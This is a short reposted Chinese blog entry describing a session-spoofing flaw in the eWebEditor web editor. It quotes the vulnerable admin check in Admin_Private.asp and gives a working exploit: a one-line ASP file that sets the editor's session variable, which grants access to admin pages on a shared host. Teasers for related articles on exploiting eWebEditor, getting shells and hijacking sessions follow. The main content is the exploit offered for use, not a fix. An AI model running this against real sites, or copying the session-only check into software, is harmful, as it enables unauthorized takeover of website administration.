eWebEditor session欺骗漏洞

转载 2006年05月25日 23:10:00

eWebEditor在线编辑器
漏洞文件:Admin_Private.asp
漏洞语句:<%

If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If

只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个h4x0r.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp

漏洞影响:虚拟主机的克星. 

相关文章推荐

ewebeditor漏洞利用总结

碰到EWEBEDITOR的比较多,找了些资料,以后方便利用 先来说说第一个: 成功登录后台,发现后台很简陋,只有EWEBEDITOR可以利用,但是登陆后台被删除了(admin_login.asp)...
  • s98
  • s98
  • 2012-02-06 15:02
  • 899

Ewebeditor 2.1.6上传漏洞 UNION运用-直接得SHELL

以前曾进过一个网站,把上传部份的asp代码下载回来研究,当时感觉有漏洞但没仔细研究,还以为那是他们自已写的程序。前几天看到ewebeditor有漏洞的文章才想起那个网站原来用的也是ewebeditor...

修复eWebEditor漏洞需要注意以下几个方面(大全总结)

第一步:下载eWebEditor2.8 修正版下载地址http://ewebeditor.webasp.net/download.asp解压放到项目文件目录下. 为了方便使用我把文件改名为ewebed...

ewebeditor漏洞利用总结

先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下: 1、首先访问默认管理页看是否存在。         默认管理页地址2.80以前为 ewebeditor/admin_login....

ewebeditor漏洞利用总结

ewebeditor漏洞利用总结      先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下: 1、首先访问默认管理页看是否存在。         默认管理页地址2.8...

固定SessionID 漏洞 攻击(session fixation attacks)

固定session 攻击:session fixation attacks 一个简单的登录控制 下面是一个最常用最简单的登录控制流程,通过表单提交用户名密码,servlet判断用户名密码,正确则写...

PHP漏洞全解(七)-Session劫持

本文主要介绍针对PHP网站Session劫持。session劫持是一种比较复杂的攻击方法。大部分互联网上的电脑多存在被攻击的危险。这是一种劫持tcp协议的方法,所以几乎所有的局域网,都存在被劫持可能。...

PHP漏洞全解(七)-Session劫持

服务端和客户端之间是通过session(会话)来连接沟通。当客户端的浏览器连接到服务器后,服务器就会建立一个该用户的session。每个用户的session都是独立的,并且由服务器来维护。每个用户的s...

PHP漏洞全解(六)-Session劫持

服务端和客户端之间是通过session(会话)来连接沟通。当客户端的浏览器连接到服务器后,服务器就会建立一个该用户的session。每个用户的session都是独立的,并且由服务器来维护。每个用户的s...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)